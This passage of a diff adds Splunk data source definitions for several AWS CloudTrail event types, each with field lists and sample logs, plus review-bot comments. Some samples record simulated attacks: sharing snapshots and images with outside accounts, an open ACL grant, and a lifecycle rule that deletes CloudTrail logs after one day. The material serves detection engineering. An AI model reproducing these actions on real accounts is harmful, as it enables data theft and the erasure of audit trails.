+ "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-10T22:04:13Z", "eventSource":
+ "ec2.amazonaws.com", "eventName": "GetPasswordData", "awsRegion": "us-west-2", "sourceIPAddress":
+ "142.254.89.27", "userAgent": "stratus-red-team_e3e4b259-63a4-4d89-acd5-a7286a279bb8",
+ "errorCode": "Client.UnauthorizedOperation", "errorMessage": "You are not authorized
+ to perform this operation. Encoded authorization failure message: OwnXKlWs2vtfsyXhkYTFO35PfDwIeH4oGadP2dmbdguXBDpSfP-65XwZU4JdWht_u8p9BlgIZ0QOYIzmm5-ApXc7HsgOynmQvF4vFNUxxiuY0w-VRNBiuPmphwnJqYln8pTJogn0DfcleY5TIuDEFwmGvZHnGMmK1kXJ1VcUiQvbK_vuDpSqIDFz-jqcnOTjzsC4DXlTZkHLL1HEeNVIjI9HCEWYG4CuG9Ti8BQ0AnGVkU8oqvtS6iyVlnPI9oId5_AWpfmE1ijhNKbgFH77DjRn6QyR5rGkGYYFpvaIyMvX33Vti4RzfAyJdpuzMgp6tV-q_Rbh0ikwBJvUtiiGfmqzdQynfRNDQmXJ3ruifOjGmUz34M90SGFJKi5CVHGThtO3UWj9EqYXpKdu_JgTYEqxWvRBopB--V7tOap8XKuz7W3rWyHN2clHA0yooLZ3DV34LWgzzDp9Iv66829HSTwGz7h2P0sGdCNuV_FCxwQzWYa8f6_h1By90MvWUvmEDLSzOfA_PF6BcqCmV8XBiPUvCMPebDSGmPwSa371J5Yn2xEiuQadfuNYRLZnd2i1V_NF9ax67BdZ",
+ "requestParameters": {"instanceId": "i-7sap2krlslv6adrs"}, "responseElements": null,
+ "requestID": "87368810-7b30-4ff9-b097-702778a53f22", "eventID": "0cdd3757-296a-4454-9619-d0f8be335081",
+ "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
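Review bot: The `errorMessage` value in `example_log` embeds the full encoded authorization-failure token from the originating account, which adds several hundred opaque characters to the sample and may be decodable through STS to reveal policy-evaluation details. The field inventory only needs the field to be present, so truncating the value to its readable prefix, `"errorMessage": "You are not authorized to perform this operation."`, keeps the sample useful without carrying the token. Note also that `mfaAuthenticated` arrives as the string `"false"` in this sample, so any search over `userIdentity.sessionContext.attributes.mfaAuthenticated` should compare against the string rather than a boolean.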
diff --git a/data_sources/aws_cloudtrail_jobcreated.yml b/data_sources/aws_cloudtrail_jobcreated.yml
new file mode 100644
index 0000000000..c81ed19015
--- /dev/null
+++ b/data_sources/aws_cloudtrail_jobcreated.yml
@@ -0,0 +1,84 @@
+name: AWS CloudTrail JobCreated
+id: 6473289b-d097-4c86-a837-3cc5ae408155
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail JobCreated
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestParameters
+- responseElements
+- serviceEventDetails.jobArn
+- serviceEventDetails.jobEventId
+- serviceEventDetails.jobId
+- serviceEventDetails.status
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- userAgent
+- userIdentity.accountId
+- userIdentity.invokedBy
+- user_agent
+- user_group_id
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"accountId": "111111111111",
+ "invokedBy": "s3.amazonaws.com"}, "eventTime": "2023-04-24T23:51:17Z", "eventSource":
+ "s3.amazonaws.com", "eventName": "JobCreated", "awsRegion": "us-west-2", "sourceIPAddress":
+ "s3.amazonaws.com", "userAgent": "s3.amazonaws.com", "requestParameters": null,
+ "responseElements": null, "eventID": "894153ad-ed86-4719-bb66-6c52ef7dc767", "readOnly":
+ false, "eventType": "AwsServiceEvent", "managementEvent": true, "recipientAccountId":
+ "111111111111", "serviceEventDetails": {"jobId": "bb54efd8-937d-4f0c-967d-aa8443998dac",
+ "jobArn": "arn:aws:s3:us-west-2:111111111111:job/bb54efd8-937d-4f0c-967d-aa8443998dac",
+ "status": "New", "jobEventId": "4e70d2f1053c07a79d9be9a14e486020", "failureCodes":
+ [], "statusChangeReason": []}, "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_modifydbinstance.yml b/data_sources/aws_cloudtrail_modifydbinstance.yml
new file mode 100644
index 0000000000..577d375168
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifydbinstance.yml
@@ -0,0 +1,193 @@
+name: AWS CloudTrail ModifyDBInstance
+id: bfa2912d-1a33-4b05-be46-543874d68241
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifyDBInstance
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.allowMajorVersionUpgrade
+- requestParameters.applyImmediately
+- requestParameters.dBInstanceIdentifier
+- requestParameters.deletionProtection
+- requestParameters.masterUserPassword
+- responseElements.allocatedStorage
+- responseElements.autoMinorVersionUpgrade
+- responseElements.availabilityZone
+- responseElements.backupRetentionPeriod
+- responseElements.backupTarget
+- responseElements.cACertificateIdentifier
+- responseElements.copyTagsToSnapshot
+- responseElements.customerOwnedIpEnabled
+- responseElements.dBInstanceArn
+- responseElements.dBInstanceClass
+- responseElements.dBInstanceIdentifier
+- responseElements.dBInstanceStatus
+- responseElements.dBParameterGroups{}.dBParameterGroupName
+- responseElements.dBParameterGroups{}.parameterApplyStatus
+- responseElements.dBSubnetGroup.dBSubnetGroupDescription
+- responseElements.dBSubnetGroup.dBSubnetGroupName
+- responseElements.dBSubnetGroup.subnetGroupStatus
+- responseElements.dBSubnetGroup.subnets{}.subnetAvailabilityZone.name
+- responseElements.dBSubnetGroup.subnets{}.subnetIdentifier
+- responseElements.dBSubnetGroup.subnets{}.subnetStatus
+- responseElements.dBSubnetGroup.vpcId
+- responseElements.dbInstancePort
+- responseElements.dbiResourceId
+- responseElements.deletionProtection
+- responseElements.endpoint.address
+- responseElements.endpoint.hostedZoneId
+- responseElements.endpoint.port
+- responseElements.engine
+- responseElements.engineVersion
+- responseElements.enhancedMonitoringResourceArn
+- responseElements.httpEndpointEnabled
+- responseElements.iAMDatabaseAuthenticationEnabled
+- responseElements.instanceCreateTime
+- responseElements.kmsKeyId
+- responseElements.latestRestorableTime
+- responseElements.licenseModel
+- responseElements.masterUsername
+- responseElements.monitoringInterval
+- responseElements.monitoringRoleArn
+- responseElements.multiAZ
+- responseElements.networkType
+- responseElements.optionGroupMemberships{}.optionGroupName
+- responseElements.optionGroupMemberships{}.status
+- responseElements.pendingModifiedValues.masterUserPassword
+- responseElements.performanceInsightsEnabled
+- responseElements.performanceInsightsKMSKeyId
+- responseElements.performanceInsightsRetentionPeriod
+- responseElements.preferredBackupWindow
+- responseElements.preferredMaintenanceWindow
+- responseElements.publiclyAccessible
+- responseElements.storageEncrypted
+- responseElements.storageThroughput
+- responseElements.storageType
+- responseElements.vpcSecurityGroups{}.status
+- responseElements.vpcSecurityGroups{}.vpcSecurityGroupId
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLDF6WP4HD6:gowthamarajr@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/gowthamarajr@splunk.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAKJDBQGB", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+ "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-05T08:47:55Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-05T09:19:15Z", "eventSource":
+ "rds.amazonaws.com", "eventName": "ModifyDBInstance", "awsRegion": "us-west-2",
+ "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters":
+ {"dBInstanceIdentifier": "database-1", "applyImmediately": true, "masterUserPassword":
+ "****", "allowMajorVersionUpgrade": false, "deletionProtection": true}, "responseElements":
+ {"dBInstanceIdentifier": "database-1", "dBInstanceClass": "db.m6g.large", "engine":
+ "postgres", "dBInstanceStatus": "available", "masterUsername": "postgres", "endpoint":
+ {"address": "database-1.ce6wk5bvtc0t.us-west-2.rds.amazonaws.com", "port": 5432,
+ "hostedZoneId": "Z1PVIF0B656C1W"}, "allocatedStorage": 5, "instanceCreateTime":
+ "Aug 5, 2022 9:02:51 AM", "preferredBackupWindow": "06:35-07:05", "backupRetentionPeriod":
+ 7, "dBSecurityGroups": [], "vpcSecurityGroups": [{"vpcSecurityGroupId": "sg-46cfd020",
+ "status": "active"}], "dBParameterGroups": [{"dBParameterGroupName": "default.postgres14",
+ "parameterApplyStatus": "in-sync"}], "availabilityZone": "us-west-2a", "dBSubnetGroup":
+ {"dBSubnetGroupName": "default", "dBSubnetGroupDescription": "default", "vpcId":
+ "vpc-5f02343b", "subnetGroupStatus": "Complete", "subnets": [{"subnetIdentifier":
+ "subnet-43225f35", "subnetAvailabilityZone": {"name": "us-west-2b"}, "subnetOutpost":
+ {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-e55d7881", "subnetAvailabilityZone":
+ {"name": "us-west-2a"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier":
+ "subnet-0beddb972f034bdaa", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost":
+ {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-2d70cd75", "subnetAvailabilityZone":
+ {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}]}, "preferredMaintenanceWindow":
+ "sat:11:44-sat:12:14", "pendingModifiedValues": {"masterUserPassword": "****"},
+ "latestRestorableTime": "Aug 5, 2022 9:12:31 AM", "multiAZ": false, "engineVersion":
+ "14.2", "autoMinorVersionUpgrade": true, "readReplicaDBInstanceIdentifiers": [],
+ "licenseModel": "postgresql-license", "storageThroughput": 0, "optionGroupMemberships":
+ [{"optionGroupName": "default:postgres-14", "status": "in-sync"}], "publiclyAccessible":
+ false, "storageType": "standard", "dbInstancePort": 0, "storageEncrypted": true,
+ "kmsKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623",
+ "dbiResourceId": "db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "cACertificateIdentifier": "rds-ca-2019",
+ "domainMemberships": [], "copyTagsToSnapshot": true, "monitoringInterval": 60, "enhancedMonitoringResourceArn":
+ "arn:aws:logs:us-west-2:111111111111:log-group:RDSOSMetrics:log-stream:db-IX2K4LYFLBVZDHBYNPEAVFHFQM",
+ "monitoringRoleArn": "arn:aws:iam::111111111111:role/rds-monitoring-role", "dBInstanceArn":
+ "arn:aws:rds:us-west-2:111111111111:db:database-1", "iAMDatabaseAuthenticationEnabled":
+ false, "performanceInsightsEnabled": true, "performanceInsightsKMSKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623",
+ "performanceInsightsRetentionPeriod": 7, "deletionProtection": true, "associatedRoles":
+ [], "httpEndpointEnabled": false, "tagList": [], "customerOwnedIpEnabled": false,
+ "networkType": "IPV4", "backupTarget": "region"}, "requestID": "59e6b621-2f12-415b-bde4-21fa2dc7c113",
+ "eventID": "46351ca1-760e-4eef-b3ff-19723e13fbf8", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "sessionCredentialFromConsole": "true"}'
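Review bot: The `example_log` here keeps a personal identity, `gowthamarajr@splunk.com`, in both `principalId` and `arn`, whereas the otherwise identical SSO session shape in the ModifyImageAttribute sample below was sanitised to `bonobo@bo.com`; the two samples should be scrubbed consistently, e.g. `"principalId": "AROAYTOGP2RLDF6WP4HD6:user@example.com"` with the matching `arn` suffix. Separately, `requestParameters.masterUserPassword` and `responseElements.pendingModifiedValues.masterUserPassword` are listed as fields but the sample shows both masked as `"****"`, so a detection built on this data source should only test for the presence of these keys, never their value.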
diff --git a/data_sources/aws_cloudtrail_modifyimageattribute.yml b/data_sources/aws_cloudtrail_modifyimageattribute.yml
new file mode 100644
index 0000000000..3b1b59efe1
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifyimageattribute.yml
@@ -0,0 +1,108 @@
+name: AWS CloudTrail ModifyImageAttribute
+id: 667c2115-8082-419e-b541-8150066bda4d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifyImageAttribute
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.attributeType
+- requestParameters.imageId
+- requestParameters.launchPermission.add.items{}.userId
+- responseElements._return
+- responseElements.requestId
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLDF6WP4HD6:bonobo@bo.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bonobo@bo.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLBHIEEEPN", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+ "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-23T19:27:44Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-23T21:47:28Z", "eventSource":
+ "ec2.amazonaws.com", "eventName": "ModifyImageAttribute", "awsRegion": "us-west-2",
+ "sourceIPAddress": "72.135.245.10", "userAgent": "AWS Internal", "requestParameters":
+ {"imageId": "ami-06dac31db29508566", "launchPermission": {"add": {"items": [{"userId":
+ "140429656527"}]}}, "attributeType": "launchPermission"}, "responseElements": {"requestId":
+ "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "_return": true}, "requestID": "84c431ce-6268-4218-aaf8-b4cdc1cd4055",
+ "eventID": "957e1b12-ea17-4006-aefd-20677ace72b8", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_modifysnapshotattribute.yml b/data_sources/aws_cloudtrail_modifysnapshotattribute.yml
new file mode 100644
index 0000000000..a2c70947e4
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifysnapshotattribute.yml
@@ -0,0 +1,101 @@
+name: AWS CloudTrail ModifySnapshotAttribute
+id: 7e5aa947-3a0d-4ee5-b800-0c10b555da05
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifySnapshotAttribute
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.attributeType
+- requestParameters.createVolumePermission.add.items{}.userId
+- requestParameters.snapshotId
+- responseElements._return
+- responseElements.requestId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName":
+ "bhavin_console"}, "eventTime": "2023-03-20T22:31:36Z", "eventSource": "ec2.amazonaws.com",
+ "eventName": "ModifySnapshotAttribute", "awsRegion": "us-west-2", "sourceIPAddress":
+ "72.135.1.1", "userAgent": "stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d",
+ "requestParameters": {"snapshotId": "snap-02effb3bb62786b18", "createVolumePermission":
+ {"add": {"items": [{"userId": "012345678912"}]}}, "attributeType": "CREATE_VOLUME_PERMISSION"},
+ "responseElements": {"requestId": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "_return":
+ true}, "requestID": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "eventID": "62e027d3-7191-48f4-b5fe-4b66c58b3008",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putbucketacl.yml b/data_sources/aws_cloudtrail_putbucketacl.yml
new file mode 100644
index 0000000000..c3deffdc38
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketacl.yml
@@ -0,0 +1,116 @@
+name: AWS CloudTrail PutBucketAcl
+id: 28fffbfd-d98d-4a42-990b-b04ab47422eb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketAcl
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.accessControlList.x-amz-grant-write-acp
+- requestParameters.acl
+- requestParameters.bucketName
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"},
+ "eventTime": "2021-01-12T14:03:17Z", "eventSource": "s3.amazonaws.com", "eventName":
+ "PutBucketAcl", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65",
+ "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3api.put-bucket-acl]",
+ "requestParameters": {"bucketName": "patricktestbucket19", "Host": "patricktestbucket19.s3.eu-central-1.amazonaws.com",
+ "acl": "", "accessControlList": {"x-amz-grant-write-acp": "uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}},
+ "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod":
+ "AuthHeader", "x-amz-id-2": "qb+xR18y4+4serdq8conds+tNROklOFRYciGHof4z1pcnTnT9SCrx6iYHuupPNaiMnZ9kdB43yE=",
+ "bytesTransferredOut": 0}, "requestID": "23FAB394417ECFCD", "eventID": "9feee3c9-711f-4f7d-af4c-992907a2a521",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+ "ARN": "arn:aws:s3:::patricktestbucket19"}], "eventType": "AwsApiCall", "managementEvent":
+ true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
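Review bot: The `fields` list appears to be derived from this single sample, so the only ACL grant key it names is `requestParameters.accessControlList.x-amz-grant-write-acp`; a PutBucketAcl event that grants via `x-amz-grant-read` or `x-amz-grant-full-control`, or that sets a canned `acl` value instead of the empty string shown here, would carry keys this file does not enumerate. Since detections consuming this data source may treat the list as authoritative, a one-line comment above `fields:` noting that it reflects one observed event and is not exhaustive, or adding the sibling grant headers, would avoid that assumption. The sample's grant of write-ACP to the global `AuthenticatedUsers` group is itself the misconfiguration such detections target, so it is a fitting example to keep.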
diff --git a/data_sources/aws_cloudtrail_putbucketlifecycle.yml b/data_sources/aws_cloudtrail_putbucketlifecycle.yml
new file mode 100644
index 0000000000..d392e87cdd
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketlifecycle.yml
@@ -0,0 +1,120 @@
+name: AWS CloudTrail PutBucketLifecycle
+id: 1c73e954-87b6-4bd7-ac6a-5db7c4082b22
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketLifecycle
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.LifecycleConfiguration.Rule.Expiration.Days
+- requestParameters.LifecycleConfiguration.Rule.Filter.Prefix
+- requestParameters.LifecycleConfiguration.Rule.ID
+- requestParameters.LifecycleConfiguration.Rule.Status
+- requestParameters.LifecycleConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.lifecycle
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+ "eventTime": "2022-07-13T21:58:27Z", "eventSource": "s3.amazonaws.com", "eventName":
+ "PutBucketLifecycle", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57",
+ "userAgent": "[stratus-red-team_d73089cf-1905-430c-b6d3-4dc4d669190f]", "requestParameters":
+ {"lifecycle": "", "bucketName": "my-cloudtrail-bucket-alfsujjpnbpguqrh", "LifecycleConfiguration":
+ {"xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled",
+ "Filter": {"Prefix": "*"}, "Expiration": {"Days": 1}, "ID": "nuke-cloudtrail-logs-after-1-day"}},
+ "Host": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}, "responseElements":
+ null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "bytesTransferredIn": 249, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "TVXZE5kOVTMLqYlmKK+j/5g6flwkiFXFfw8PyNivFO4/9YXnDsyzFlGEzAy2rukTTiukLdEwtuM=",
